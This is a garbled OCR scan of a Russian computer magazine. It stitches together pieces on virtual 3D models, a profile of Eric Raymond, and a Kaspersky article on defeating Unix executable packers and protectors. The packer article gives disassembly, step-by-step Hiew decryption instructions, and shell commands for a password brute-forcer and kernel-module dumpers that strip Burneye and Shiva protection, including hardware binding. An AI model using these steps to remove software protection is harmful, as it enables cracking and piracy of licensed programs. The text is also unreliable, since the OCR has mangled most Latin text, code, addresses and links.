О ѴѴеЬЬіе Т оокау 

Вебби Тукеи известна всему миру как первая 
виртуальная модель. У нее идеальная фигура 
с магическими цифрами 90-60-90, и за опреде- 
ленную сумму она согласится осуществить по- 
каз модного белья для какого-нибудь агентства. 
Г од рождения Вебби — 1999, а ее отцом явля- 
ется австралийский дизайнер из фирмы ІІІизіоп 
2К Стивен Стахлберг. Вебби с рождения была 
обречена стать моделью, по крайней мере, та- 
кой ее видели создатели. Сразу же после пре- 
зентации одно из самых престижных в мире мо- 
дельных агентств ЕІііе подписало с мисс Тукеи 
контракт. Ее фотографии появились во многих 

Ѵ пах, она прохаживалась по виртуальным 
мам -^ик 2000 году Вебби стала самой 
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ведущей, ѴѴеЬЬіе 
Мазсоі — интер- 
активный агент, 

помогающий юзерам искать информацию, по- 
лучать почту и т.д., ХХ0 — музыкальная группа 
с участием виртуальных моделей под предво- 
дительством Вебби, ѴѴЬаі ѴѴе ѴѴеаг — виртуаль- 
ный магазин, в котором тоже не обошлось без 
трехмерной девушки. 

Сейчас Вебби уже далеко не единственная вир- 
туальная модель. Во Франции, например, мо- 
дельное агентство Форд взяло на работу трех- 
мерную Еву Солел. Девушка стала настолько 
популярной, что ведет собственное радиошоу 
по четвергам. Также с годами слава Вебби не- 
сколько поутихла — теперь она известна не как 
самая ценная модель, а как первый виртуальный 
персонаж, получивший коммерческий успех в 
реальном бизнесе. 



ОКауа 

Пожалуй, никому не удавалось еще добиться 
такого уровня реалистичности при создании 
виртуальной девушки, как автору Кауа. Г еро- 



дорогостоящей моделью на рынке моды. Ее 
годовые доходы составили 15 миллионов дол- 
ларов, что было на 1 0 миллионов выше доходов 
самой высокооплачиваемойживой моделиЖи- 
зель Бундхен. «Мы надеемся, что Вебби станет 
символом индустрии виртуальных развлече- 
ний, и стоимость ее будет исчисляться сотнями 
миллионов долларов», — поделился с прессой 
президент ІІІизіоп 2К. И в подтверждение своих 
слов указал на очередной контракт с корпо- 
рацией ІЧокіа, для которой Вебби выступила 
в качестве символа объединения интернета и 
мобильной связи. 

Хотя у Вебби нет вредных привычек, присущих 
настоящим моделям (курение, алкоголь, риск 
потолстеть или заболеть), капризов ее не лиши- 
ли. Она является ярой сторонницей движения 
за права животных, поэтому ни при каких обсто- 
ятельствах не станет носить меховую одежду. 
Также девушка принимала участие в проектах 
по взлому ключа ВЗА. 

Когда Вебби стала достаточно известной, 
ІІІизіоп 2К запустила несколько новых проек- 
тов: ѴѴеЬЬіе 

РІапеі — ком- 
пьютерное шоу 
с участием Веб- 
би, в котором 
она общается с 
реальными и вирту- 
альными знаменитос- 
тями, ѴѴеЬЬіеіаіптепі 
— беспроводной 
интернет-сервис, 
транслирующий на 
мобильные телефо- 
ны эфир новостей 
со знакомой всем 



первая виртуаль- 
ная телеведущая 
Ананова 








иня бразильского ЗО-моделлера Алсеу Ба- 
тистао не претендует на титул самой горячей 
красотки — у нее курносый носик, веснушки 
налице, большой рот. Тем не менее, она мила 
и привлекательна, но главное — потрясающе 
достоверна. Можно различить даже поры на 
коже. Проект пока находится в разработке: у 
Каи еще нет тела, и, чтобы сэкономить время 
на моделировании волос, автор покрыл го- 
лову девушки простеньким беретом. Но уже 
сейчас можно оценить работу Алсеу по фо- 
тографиям и коротенькому ролику, где Кая 
рассказывает о себе. 

Практически все элементы модели были сде- 
ланы в ЗО-пакете Мауа, с использованием 
стандартных фильтров. Причем текстуры ри- 
совались от руки, а не брались с готовых фо- 
тографий. Как говорит создатель, Кая разра- 
батывается для анимационных целей, поэтому 
все основные элементы создаются в трехмер- 
ном пакете. 

Проект не является коммерческим — Батистао 
работает над ним в свободное от основной (ди- 
ректор РХ-компании Ѵеіог 2его) работы время. 
Автор планирует сделать свою девочку интер- 
активной, так что любой посетитель сайта смо- 
жет управлять ее эмоциями и движениями, а 
также пообщаться с ней. А в перспективе найти 
для нее работу в шоу-бизнесе, кинематографе 
или где-нибудь еще. 

Что касается «несовершенства красоты» 
Каи, то один известный ЗО-моделлер сказал: 
«Многие дизайнеры гонятся за идеальной кра- 
сотой, и не понимают, что это не делает их пер- 
сонажей по-настоящему живыми. Небольшие 
изъяны можно отыскать во внешности любого 
человека. И настоящее мастерство — это на- 
делить героиню элементами, которые заставят 



людей поверить в ее реальность, вместе с тем 
не обделив ее харизмой » . 

Кстати, Кая завоевала несколько наград, вклю- 
чая «Лучший персонаж» нафестивапе Апітадо 
в Германии и призовое место на лондонской 
выставке «Лица будущего». 

О Мика 

Девушка, которая покорила лондонскую вы- 
ставку последних достижений в создании 
киберженщин. Посетители разошлись во 
мнении, кто реалистичнее — Кая или Мика. 
Автором Мики Аморе стал легендарный ЗО- 
дизайнер Рене Морель, работавший над 
фильмом РіпаІ Рапіазу и приложивший руку к 
созданию Аки Росс. 

Обитает Мика на сайте атагопзоиі.сот — ам- 
бициозном проекте «для взрослых», пред- 
ставляющим собой сборник интерактивных 
комиксов, герои которых — сексапильные 
трехмерные девушки. Сюжет развивается в 
будущем во вселенной Аптагоп, населенной 
исключительно женским полом. Она кишит го- 
рячими красотками, ездящими нарокетоподоб- 
ных аппаратах и повернутыми на сексе. Агент 
Мика понимает, что что-то не так в этом мире, 
и начинает поиски мифического создания под 
названием «мужчина». Но на пути сталкивает- 
ся лишь с другими сексоманьячками. 

Понятное дело, для того, чтобы полностью на- 
сладиться приключениями виртуальной девуш- 
ки, придется оплатить членство ($10 в месяц). 
Мемберы получают полный доступ ко всем 
страницам и интерактивным возможностям. К 
примеру, могут увеличивать/уменьшать изоб- 
ражение, включать анимацию в определенных 
частях комикса и даже влиять на происходящее 
с героями. Помимо Микки, в Аптагоп 8оиІ можно 



встретить Карма Шутру — верховную священ- 
ницу секретной секты, одетую в черный латекс, 
8 — сексуальную рабыню Кармы, Нели — хра- 
нительницу тайн вселенной Аптагоп, Дика — 
пилота космического корабля, который терпит 
крушение в мире амазонок. 

Проект этот только начинает свое развитие. 
Сейчас создателями подготовлено около 40 
интерактивных страниц. По словам владель- 
цев сайта, в ближайшее время появятся следу- 
ющие части. 

Как видишь, интерес к созданию виртуальных 
людей, неотличимых от живых, растет, и для 
лучших ЗО-моделлеров является вызовом. 
Если раньше подобное было просто невозмож- 
но из-за ограничений технологий, то теперь 
создать реалистичную трехмерную красавицу 
вполне реально. 

В мире ежегодно проходят различные выстав- 
ки, где ведущие дизайнеры демонстрируют 
свои работы. Например, выставка «Совершен- 
но реальные женщины в битах и байтах» , впер- 
вые прошедшая осенью 2003 года в Лондоне. 
Также уже проходят конкурсы красоты вир- 
туальных малышек. Встретить уже знакомую 
тебе Каю, футуристическую Мику и многих 
других персонажей можно по адресу: ѵѵѵѵѵѵ. 
тіззбіаііаіѵѵогісі.сот . Автор выбранной жюри 
королевы получает 5 тысяч долларов и конт- 
ракт с агентством «Церами» об использовании 
модели в бизнесе. 

Как знать, может, через несколько лет мы уже 
не сможем определить, где фотография насто- 
ящей девушки, а где трехмерное изображение. 
Может, в скором будущем реальных актеров и 
певцов заменят их виртуальные прототипы. 
Мир развивается слишком быстро, чтобы знать 
наверняка, что нас ждет уже завтра, зс 
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ІІЫОѴѴОВК 



МОЖНО ЛИ ВЛЮБИТЬСЯ В ВИРТУАЛЬНОГО ПЕРСОНАЖА? ЗНАЮ, ЧТО ТЫ СЕЙЧАС НАЧНЕШЬ МОТАТЬ ГОЛОВОЙ И 
УБЕЖДАТЬ МЕНЯ, ЧТО ТЫ НЕ ТАКОЙ, И ДЕВУШКИ, КОТОРЫХ МОЖНО ВЕЗДЕ ПОЩУПАТЬ, ТЕБЯ ВОЗБУЖДАЮТ БОЛЬШЕ. 

Я И САМ ТАК ДУМАЛ РАНЬШЕ. НО В ПРОЦЕССЕ ПОДГОТОВКИ СТАТЬИ, КОГДА Я ПРОСМАТРИВАЛ СОТНИ ФОТОГРАФИЙ 
И ДЕСЯТКИ ВИДЕОРОЛИКОВ, В МОЕЙ ДУШЕ ПОСТЕПЕННО ЗАРОЖДАЛОСЬ СОМНЕНИЕ. ДУМАЮ, ТЫ УЖЕ ПОНЯЛ, О ЧЕМ 
БУДЕТ ЭТА СТАТЬЯ. 





ЩР' 


- 3 '- 3, сцена 





□ рик родился в 1 957 году в Бостоне и 
был старшим из пяти детей в семье. 
Отец его работал системным про- 
граммистом на Зреггу ІЛЧІѴАС, в связи с этим 
ему приходилось часто переезжать с места на 
место. И к тому времени, как Реймонду испол- 
нилось 14 лет, семья успела побывать на трех 
континентах, покаокончательно не оселав Пен- 
сильвании. Из-за того, что у Эрика сформиро- 
валась легкая форма церебрального паралича, 
он оказался предметом насмешек со стороны 
одноклассников. Это, а также то обстоятельс- 
тво, что он воспитывался по строгим католичес- 



ким правилам, выработало в нем неприязнь к 
любым проявлениям власти, которая с годами 
только росла. Несмотря на болезнь, Эрик был 
очень одаренным ребенком и имел способ- 
ности к математике, философии и музыке. В 
университете Пенсильвании преподаватели 
считали, что у него большой потенциал, но не- 
достаток дисциплины и нежелание следовать 
официальным требованиям привели ктому, что 
Эрик окончил вуз без какой-либо ученой степе- 
ни. Тем не менее, время в институте не прошло 
зря — Реймонд самостоятельно освоил про- 
граммирование и в последующие годы работал 



на несколько компьютерных компаний. В 1985 
году, решив, что работать на корпорацию он не 
может, Эрик оставил работу и посвятил себя 
журналистике. 

В 70-х годах Эрик Реймонд познакомился и сдру- 
жился с Ричардом Столманом, который вселил 
в него любовь к опенсорс. Эрик стал одним из 
первых активистов движения за свободное ПО 
и внес большой вклад в развитие проекта ОШ. 
Среди его первых опенсорс программ были: 
почтовый клиент РеісІітаіІ, редактор Оозтасз, 
конфигуратор видеонастроек для ХРгее86, 
карточный солитер для ѴМ5, Иех битрег, про- 
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Х-РПОРІІ.Е 



стенький кейлоггер, языки программирования Проекты 

ІІ\ІТЕРСАІ_ и СІІРЦ сервис-демон дрссі и т.д. До своего публичного появления в мире опен- 

сорс Эрик был известен как автор «Нового ха- 
Хобби керского словаря». По сути, это старый добрый 

Полевые ролевые игры (участвовал в более Наскег’з іагдоп Тііе, но основательно отредактиро- 
30-ти крупных полевых РПГ), компьютерные ванный и дополненный Реймондом. Многие счи- 
ѴѴагдатез, различные виды единоборств: име- тают, что Эрик испортил файл, привнеся в него 
ет черный пояс по Моо Эо (подвид Тхэк Ван До), собственные технические термины и разбавив 
практикует айкидо, кунг фу и сицилийский бой на историю своими опенсорсными идеалами. Как 
мечах. Играет на флейте, гитаре, ударных и даже бы то ни было, он занимался доработкой этого 
выпустил пару альбомов. Хорошо разбирается в документа с начала 90-х, и в 1996 году, в изда- 



огнестрельном оружии и постоянно практикует- тельстве МІТ Ргезз, вышла печатная версия. В 
ся в стрельбе. Также Эрик — большой поклонник электронном виде ее можно найти здесь: Шр:І 
научной фантастики. В начале 90-х выпустил саіЬ.ога/~езг/іагаоп . Помимо этого. Эрик стал ав- 
несколько десятков обзоров научно-фантасти- тором еще двух известных книг: «Собор и базар» 
ческих книг. (своего рода манифест идеологии опенсорса) и 



«Искусство программирования в ІІКІІХ». Когда в 
январе 1998 года компания Ыеізсаре выложила 
в свободный доступ исходники своего браузера, 
ее представители признались, что на это реше- 
ние их вдохновило эссе Реймонда «Собор и ба- 
зар». Что, конечно, очень польстило Эрику. 

В начале 90-х он принимал активное участие в 
проекте ОШ Ептасз 19, занимаясь разработкой 
Іізр-библиотек. А с 1997 по 1998 год занимался 
поддержкой Зипзііе — крупнейшего в мире І_іпих 
онлайнового хранилища программ. Он написал 
программную оболочку кеерег, которая исполь- 
зуется на сайте по сей день. 

В феврале 1998 года Брюс Перенс и Эрик 
Реймонд основали организацию Ореп Зоигсе 
Іпійайѵе, главной целью которой является про- 
движение свободного ПО. Реймонд оставался 
ее президентом вплоть до 2005 года, взяв на себя 
роль представителя опенсорс-движения в прес- 



се и бизнесе. Благодаря своей активности он за 
несколько лет стал одной из ключевых фигур в 
мире ореп зоигсе. Хотя его идеи не всегда сов- 
падали с идеями других отцов свободного ПО. 
Эрик не перестает критиковать в своих статьях 
старого друга Ричарда Столмана, говоря, что он 
слишком много занимается риторикой, и слиш- 
ком мало — написанием кода. 

Реймонд также принимал участие в нескольких 
менее известных проектах: ВВЗ с доступом в ин- 
тернет СІтезіег Соипіу ІпіегБіпк, онлайновый ар- 
хив софта Тгоѵе, рсоптт-2.0 — ІІКІІХ- 
клон РгоСотт, Зузіет V и других. 
Эрик Реймонд активно выступает за 
то, чтобы люди свободно выражали 
свои мысли в сети, использовали 
особо защищенные методы шиф- 
рования в целях безопасности и вы- 
ступали против политической цензу- 
ры и контроля. Весной 2002 года он 
завел собственный веб-блог: ІтДрѴ/езг.іЫЫіо. 
ога/?р=129 . и с тех пор эта страничка стала 
неиссякаемым источником свободных идей и 
авторских мыслей на тему І_іпих, технологий, 
расизма и войн, зс 
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КРИС КАСПЕРСКИ 



ОБЗОР УПАКОВЩИ- 
КОВ ИСПОЛНЯЕМЫХ 
ФАЙЛОВ ПОД *І\ІІХ 



ДОЛГОЕ ВРЕМЯ ЕДИНСТВЕННЫМ УПАКОВЩИКОМ ИСПОЛНЯЕМЫХ ФАЙЛОВ В *І\ІІХ^ЫЛ ЛЕГЕНДАРНЫЙ ЕІРХ, СОДЕРЖАЩИЙ 
ВСТРОЕННЫЙ ДЕКОМПРЕССОР И РАСПАКОВЫВАЮЩИЙ ФАЙЛЫ БЕЗ ОСОБОГО ТРУДА. НО СЕЙЧАС СИТУАЦИЯ ИЗМЕНИ- 
ЛАСЬ, И УПАКОВЩИКИ СТАЛИ ПОЯВЛЯТЬСЯ, КАК ГРИБЫ ПОСЛЕ ДОЖДЯ. ИМИ ОХОТНО ПОЛЬЗУЮТСЯ РАЗРАБОТЧИКИ 
КОММЕРЧЕСКИХ ПРОГРАММ С ЗАКРЫТЫМ КОДОМ, НЕ ЗАДУМЫВАЯСЬ О ТОМ, КАКИЕ ПРОБЛЕМЫ ОНИ СОЗДАЮТ СВОИМ 
ПОЛЬЗОВАТЕЛЯМ. СЕГОДНЯ МЫ ПОКАЖЕМ, КАК, НЕ БУДУЧИ ХАКЕРОМ И НЕ ИМЕЯ НАВЫКОВ В ДИЗАССЕМБЛИРОВАНИИ 
ИЛИ ОТЛАДКЕ, ПОБЕДИТЬ НАИБОЛЕЕ ПОПУЛЯРНЫЕ УПАКОВЩИКИ (ЕБЕСРУРТ, ЕІРХ, ВЕІВМЕѴЕ И ЗНІѴА). 



И паковщики исполняемых файлов 
часто используются для затрудне- 
ния анализа программы и препятс- 
твия взлому. Упакованный файл потребляет 
намного больше оперативной памяти, а на 
некоторых *піх-клонах вообще отказывает- 
ся запускаться или работает нестабильно. В 
первую очередь это касается *ВЗБ (основная 
масса упаковщиков ориентирована на І_іпих) и 
экзотических систем с экспериментальными 
ядрами наподобие НигсІ. В результате от упа- 
ковщиков/протекторов стремится избавиться 
даже тот, кто вообще не собирался ничего 
ломать! 

О ЕЬРСгурі 

Происхождение: создан индийским студен- 
том по прозвищу бипкСосІе. Распространяет- 



ся в исходных текстах на бесплатной основе: 
ѵѵѵѵѵѵ.іпІоагеа.сот/зоигсе-сосІе/риЫіс-сІотаіп/ 
еіісгѵрі-ѵі .СШтІ . 

Описание: простейший шифровщик (не упа- 
ковщик!) ЕБР-файлов, шифрующий файл по 
ХОР случайно генерируемым ключом. При- 
сваивает кодовой секции атрибут ѵѵгііаЫе и не 
убирает его после завершения расшифровки 
(что может приводить к некорректной работе 
программ, проверяющих возможность моди- 
фикации кодовой секции). Остальные секции 
(и секция данных в том числе!) остаются не- 
зашифрованными. Не содержит никаких ан- 
тиотладочных приемов, но подкладывает две 
большие свиньи дизассемблерам: «забыва- 
ет» скорректировать метку _зіагі и размещает 
свой код в секции ехіегп, истинное содержи- 
мое которой ЮА Рго отображает только в ре- 



жиме ручной загрузки при выбранной опции: 
« Рогсе изіпд оі РНТ іпзіеасі оі ЗНТ » . 
Распаковка: загружаем файл в Ніеѵѵ, двойным 
нажатием <ЕІ\ІТЕР>'а переходим в режим ди- 
зассемблера, давим <Р8> для отображения 
заголовка и переходим в точку входа по <Р5>. 
Здесь прослеживается следующий код: 

Точки входа программы, зашифрованной 
ЕІ_ГСгур1'ом 



; переходим на расшифровщик 
.08049500: ЕВ02 іглрз .0080495Е0 

; мусор, оставленный транслятором ассемблера 
.0804950Е: 06 ризітев 

.0804950Е: С6 ??? 

; сохраняем в стеке все регистры и флаги 
.080495Е0: 60 ризГіасІ 
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.080495Е1 : 9С ризШ 

; начало расшифровываемого фрагмента 
.080495Е2: ВЕС0820408 тоѵезі, 0080482С0 
.080495Е7: 8ВЕЕ тоѵ есіі, езі 

; количество двойных слов для расшифровки 
.080495Е9: В978000000 тоѵесх, 000000078 
; ключ расшифровки 

.080495ЕЕ: ВВВРОЗССОЭ тоѵеЬх, 009СС03ВО 
; читаем очередное двойное слово 
.080495ЕЗ: Ай ІосІзсІ 

; расшифровываем через хог 
.080495Е4: ЗЗСЗ хогеах.еЬх 

; записываем результат на место 
.080495Е6: АВ зіозсі 

; мотаем цикл 

.080495Е7: Е2ЕА Іоор .0080495ЕЗ 

; восстанавливаем из стека флаги и регистры 
.080495Е9: 9й рорТсІ 

.080495ЕА: 61 рорасі 

; адрес оригинальной точки входа (ОЕР) 

.080495ЕВ: ВОС0820408тоѵеЬр, 0080482С0 
; передаем управление расшифрованному коду 
.08049600: ЕЕЕ5 ітреЬр 

Запоминаем (записываем на бумажке) ад- 
рес начала расшифровываемого фрагмента 
(грузится в регистр ЕЗІ), количество расшиф- 
ровываемых двойных слов (в ЕСХ), ключ рас- 
шифровщика (в ЕВХ) и адрес оригинальной 
точки входа (в ЕВР). 

Нажимаем <Р5> (доіо) и вводим адрес начала 
расшифровываемогофрагментасточкой впе- 
реди (точка указывает Ніеѵѵ'у, что это не сме- 
щение внутри файла, а виртуальный адрес), 
в данном случае — «.80482С0». Переходим в 
НЕХ-режим двойным нажатием <ЕІ\ІТЕР>'а, 
разрешаем редактирование по <РЗ> и нажи- 
маем <Р8> (ХОР) — Ніеѵѵ запрашивает маску 
шифрования, которую необходимо вводить в 
НЕХ-виде с учетом обратного порядка байт на 
х86, в результате чего «09СС03ВОИ» превра- 
щается в «ВО 03 СС 09» (а совсем не в «ОВЗО 
СС 90», как иногда поступают начинающие), 
после чего нажимаем <Р&^"ЕСХ раз. Чтобы 
не сбиться, можно отталкиваться от адресов 
начала и конца блока, прекращая давить <Р8> 
только в том случае, когда курсор сместится 
на ЕСХ двойных слов (не байт!)/относительно 
начальной позиции. 

Пара ремарок: при входе в режим редактиро- 
вания Ніеѵѵ перестает отображать вйрту ал ьные 
адреса, переходя на физические'. сЫщ'^ні4Я 
внутри файла, в результате чего «804§^л!^» 
превр4щ аѳтся В-4Ю002С0И», но пусть нас это 
не смущает. Конечное смещение расшифро- 
вываемого блока вычисляется тривиально: 



«00002С0И + зігеоДОѴѴОРЮ) 



'786 == 4А06». 



'У'ѴГ 
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К сожалению, Ніеѵѵ не позволяет расшифро- 
вывать более одного экрана за один раз, и, 
когда курсор подходит к последней строке, 
Ніеѵѵ отказывается прокручивать файл, по- 
этому необходимо сохранить изменения по 
<Р9>, нажать <Раде Ооѵѵп>, вновь вернуться 
в режим редактирования клавишей <ЕЗ> и 
продолжить заниматься расшифровкой. 
Теперь остается только скорректировать 
адрес точки входа. Нажимаем <Е5> и пере- 
ходим по смещению 186 относительно нача- 
ла файла. Записываем число из ЕРР, не за- 
бывая про обратный порядок байт на х86 (то 
есть в данном случае это будет выглядеть так: 
«СО 82 04 08»). Нажимаем <Р9> для сохране- 
ния и выходим. Атрибуты кодовой секции мож- 
но и не восстанавливать. 

Запускаем расшифрованный файл, чтобы 
убедиться, что он работает. На этом процеду- 
ру распаковки можно считать законченной. 

ОІІРХ 

Происхождение: созданный тройкой магов — 
Магкиз ОЬегбитег, І_аз 2 Іо Моіпаг и ^6п Реізег, 
— ІІРХ относится к древнейшим распаковщи- 
кам, поддерживающим огромное количество 
форматов исполняемых файлов, среди кото- 
рых есть и ЕІ_Р. Собственно говоря, аббреви- 
атура ІІРХ именно так и расшифровывается: 
«Шітаіе Раскег Іог ехесиіаЫез». Свежую 
версию вместе с исходными текстами можно 
бесплатно скачать с родного сайта проекта: 
ѵѵѵѵѵѵ.ирх.ога или с ирх.зРпеі . 

Описание: ЕІРХупаковываетвсесекции файла 
(включая и таблицы, содержащие имена фун- 
кций динамически загружаемых библиотек), 
вполне корректно обрабатывая ЕІ_Р-формат 
и успешно работая на всем «зоопарке» *піх- 
подобных систем . Не содержит никакого кода, 
препятствующего его отладке или дизассемб- 
лированию. 

Распаковка: ЦРХсодержитвстроенный распа- 



электронного журнала Рбгаск ( ѵѵѵѵѵѵ.рбгаск. 
ога/р6гаск/63/р63-0х0с Ргосезз Ритр апсі 
Віпагѵ РесопзІгисІіоп.М ). 

Запускаем упакованную программу, открыва- 
ем новую консоль и, определив идентифика- 
тор процесса с помощью штатной утилиты рз, 
передаем его программе РО. 

К сожалению, утилита РО еще довольно сыро- 
вата, и сдампленные программы очень часто 
оказываются неработоспособными. В некото- 
рых случаях помогает ключ '-Г, запрещающий 
трогать секцию .СОТ, но чаще всего над по- 
лученным дампом приходится основательно 
поработать руками. Будем надеяться, что в 
следующих версиях РО этот недостаток будет 
преодолен. 

О Вигпеуе 

Происхождение: экспериментальный про- 
тектор, созданный хакером по кличке Зсиі, 
он же Тбе Тоѵѵег, который живет в Западной 
Г ермании и входит в группу ТЕЗО, известную 
своим отладчиком Ііпісе — аналогом зой-ісе 
под *піх. Сначала исходные тексты протекто- 
ра были недоступны, и он распространялся 
в виде уже откомпилированного файла на 
бесплатной основе: раскеізіогт.Ііпихзесипіѵ. 
сот/агоирз/Іезо/Ьигпеѵе-І.О-Ііпих-зІаІіс. 
іаг.аг . но через некоторое время Зои! от- 
дал на растерзание -30% от общего объ- 
ема кода проекта: раскеізіогт.ііпихзесипіѵ. 
сот/агоирз/іезо/Ьигпеѵе-зіпрресІ.іаг.аг . а 
затем и вовсе открыл все тексты целиком: 
раскеізіогт.ііпихзесипіѵ.сот/агоирз/іезо/ 
Ьигпеѵе-1 . 0 . 1 -згс. 1 аг.Ь 22 . 

Описание: никакой это не упаковщик, а самый 
настоящий протектор, изначально нацелен- 
ный на борьбу с хакерами. Умеет шифровать 
файлы по алгоритмам ЗНА1 и РС4, требуя от 
пользователя пароля при запуске и при не- 
обходимости привязываясь к оборудованию, 
чтобы пират, купивший одну-единственную 



ковщикг^звращающий исполняемые файлы і і^Г(ензионную копию, не выложил свой ключ 
в исходный вид (для этого достаточно указать ' на^сеобщееобозрение.Содержитнекоторые 



ключ '-сГ 
легко 
ных текстов 



ь : 

_ _ , , < 

воспрепятствовать. Достугтн-ѳс-тіці^о^; 

экстов позвоЬяо^чѵі^щ^ц^ код 

упаковщика или Изменять #расктдк^» слу- 
жебной информации: файле. 
Еще проще затереть сигнатуру «ДОѴХ!» 
дяЩуюся в кэмче'УГ^к© в энного 
этих случаях всЯроеі 



в командной строкф, однако этому, -1 пріемы против отладчиков и дизассемблеров 

(пры’жки в середину команды и установка 
собственного обработчика для ЗІОТРАР), но 
онрфеализованы настолько неумело, что про- 
тектор без труда отлаживается даже дбЬ, не 
^уЖе^пібѳ-ядерные отладчики ргіѵаіе-ісе 
е. Некоторые защищенные программы 
>ій распаковщййка^Іеи- . ц^ают^рзд поэтому использовать этот 
вает ласты, поэтому Ьаспаковкой приходится протектор следует с большой долей скепти- 



“Г 

'У ]ра 




заниматься самостоятельно. 

Нам потребуется ут|іліта для снятия дам- 
па с активных прЦ 



код которой был ОП' 




РО, исходный 



номере 

■ 



цизма и осторожности. 

Снятие пароля: против криптографии, увы, 
не пшТрешь, и все, что может предложить 
нам хакерская общественность, — это неза- 



} ^ ^ Д 4 , 
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I/ 0-^. 



> Сіі^аничка создателя ЕЬРСгурІ'а на 
ргодгаттег'з Ьеаѵеп 




> Расшифров- 
ка файла, об- 
работанного 
ЕІ_РСгурі'ом в 
Ніеѵѵ'е 




> Сайт разработ- 
чиков протектора 
ЗЬіѵа 




мысловатый ЬшЫогсе. Подходящий пере- 
борщик можно найти на Ьѵіегаае.ІпаскаІіоІіс. 
огд/зоигсе/ЦМВЬигпіпЬеІІІ.Ос.Іаг.дг . однако 
заранее следует быть готовым к тому, что 
вскрыть длинные пароли все равно не удаст- 
ся. Типичный сеанс работы с переборщиком 
выглядит так: 

Подбор пароля методом Ьгиіеіогсе 

# ./ЬигпсгаскЩ /изг/зШ^/Ьигпеуе-І .О/Ьигпеуе 
#/изг/зІиТС/іоІпп-1 .б/гип/рЬп -зІбоиТбЗ-і I ./Ьигпсгаск-І 

# ./Ьигпсгаск -р ассері -сі ипѵѵгарресі 

# сЬтосІ а+х ипѵѵгарресі 

# ./ипѵѵгарресі 

Распаковка: когда борьба с Вугпеуе всех 
хакеров окончательно достала, ВуіеРаде 
написал утилиту Ьигпеуе ипѵѵгаррег для авто- 
матического снятия протектора и представ- 
ляющую собой І_КМ- модуль (загружаемый 
модуль ядра), бесплатно распространяе- 
мый в исходных текстах (впрочем, называть 
«исходными текстами» крошечную Си-про- 
грамму можно только с большой натяжкой): 



ЬѵІегаае.ЬаскаЬоІіс.ога/зоигсе/ЬигпсІитр.с . 
Предполагается, что либо программа не защи- 
щена паролем, либо он нам уже известен (или 
подобран вышеописанной утилитой). Привяз- 
ка к оборудованию убирается в любом случае. 
Компилируем: «дсс -с Ьигпсіитр.с» (на не- 
которых системах необходимо явно указать 
подключаемые заголовочные файлы «дсс -с - 
І/изг/згс/Ііпих/іпсІисІе Ьигпсіитр.с»), заходим в 
систему под гооі'ом и начинаем взлом, потяги- 
вая свежее пиво: 

Освобождение файла от протектора Вигпеуе 

; загружаем ЬКМ-модуль в память, теперь дампер будет 
висеть резидентно, отслеживая запуск всех программ, 
и ловить из них те, которые обработаны Вигпеуе 
$ іпзтосі Ьигпсіитр 

; запускаем программу, защищенную Вигпеуе, дампер 
дожидается, когда Вигпеуе завершит расшифровку, и 
сохраняет распакованную программу в файл ./Ьигпоиі 
$ ./ІіІе_пате 

; запускаем распакованную программу, чтобы убедить- 



ся в ее работоспособности 
$ ./Ьигпоиі 

; выгружаем ЬКМ-модуль из памяти 
$ гттосі Ьигпсіитр 

О 5Ыѵа 

Происхождение: весьма амбициозный про- 
тектор, созданный двумя гуру ІЧееІ МеЬіа и 
ЗЬаип СІоѵѵез и неоднократно демонстрируе- 
мый ими наконференцияхВІаскНаі. Исходные 
тексты не разглашаются (как будто там есть, 
что скрывать!), а сам бинарник можно скачать 
как с сайта разработчиков: ѵѵѵѵѵѵ.зесигегеаіііѵ. 
сот.аи/агсІпіѵез/зІііѵа-0.95.Іаг.а2 . так и с сер- 
вера ВІаск Наі: ЫаскЬаІ.сот/ргезепІаІіопз/Ыі- 
иза-03/Ыі-из-03-теЫа/Ыі-из-03-зІііѵа-0.96.1аг . 
причем версия с ВІаск Наі'а посвежее будет, 
что наводит на определенные размышления. 
Описание: протектор поддерживает пароль- 
ную защиту (правда, без привязки к обору- 
дованию), реализует мощную антиотладку, 
многоуровневую динамическую шифровку 
с порождением дочернего отладочного про- 
цесса, эмуляцию некоторых процессорных 
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КАК СОКРУШАЮТ ПРОТЕКТОРЫ 



Г ± І-Г--.І л Мм- ■ -А -■ 



- п X 



іТиііРІ ІШІ. 

I I СЬЫ I | ІЫІ ь ' ТІ||ш-і^ .~С|іН.Ч 

Ч^РГТТІАІ ІіП* ІшИ 

Нши«І ііни-'^кИмг | 




> ЗМіѵа настолько крутой протектор, что 
даже ни в одной системе не запускается 










> Страничка хакера ВуІеВаде, поломавше- 
го Вигпеуе 



• г* у* х 



инструкций... В общем, получился почти что 
АгтасІіІІо, только под І_іпих. Но если АгтасІіІІо 
хоть как-то работает, то Збіѵа на всех доступ- 
ных мне системах выпадет в Зедтепіайоп 
ІаиІТ Тестирование проводилось на Кпорріх с 
ядрами 2. 6. 7/2. 4. 7 и Зизе с ядром 2.6.8 (как под 
ѴМѴѴаге, таки наживой машине). 

Распаковка: морской волк СНігіз Еадіе создал 
бесплатно распространяемый автоматичес- 
кий распаковщик, позволяющий любому же- 
лающему положить Збіѵа на лопатки: ѵѵѵѵѵѵ. 
ЫаскИаІ.сот/ргезепІаІіопз/Ыі-ІебегаІ-ОЗ/Ыі- 
ІебегаІ-03-еадІе/Ып4ебегаІ-03-еааІе.2ір . Пос- 
ле разархивации мы найдем мультимедийную 
презентацию ЬМесІегаІ-03-еадІе.ррі с объяс- 
нением принципов работы протектора, пару 
ібс-скриптов для упрощения дизассемблиро- 
вания защищенных файлов в ЮА Рго и еще 
один архив зігірзІтіѵаТаг.дг, содержащий ис- 
ходный код автоматического распаковщика. 
Компиляцияосуществляетсяпростымзапуском 
утилиты таке, после чего у нас на диске обра- 
зуется зігірзбіѵа (распаковщик не защищенных 
паролем файлов) и зНіѵаІкт.о (загружаемый 
модуль ядра для взлома паролей). Незапаро- 



ленные программы распаковываются так: 

# зігірзіпіѵа х.зИіѵа 

Авотдлявзломазапароленных файлов прихо- 
дится совершать гораздо больше телодвиже- 
ний (при этом предполагается, что запаролен- 
ный файл уже запущен, то есть пароль должен 
быть известен. По-другому, увы, ломать не по- 
лучается): 



записи на наличие любых сообщений 
$ іаіі /ѵаг/Іод/теззадез 

; превращаем дамп в готовый ЕЬР-файл 
$ зігірзЬіѵа -р збіѵаоиі 

ЗИіѵа — это лучший протектор из всех, су- 
ществующих под *піх, но на проверку это 
оказывается всего лишь кривая калька с 
АгтасІіІІо и к тому же практически нерабо- 
тоспособная. эс 



Распаковка файлов, 

обработанных протек- „ СВОДНАЯ ТАБЛИЦА СВОЙСТВ УПАКОВЩИКОВ 

тором 8Мѵа и защи- 
щенных паролем 



; загружаем ЬКМ-модуль в 
память 

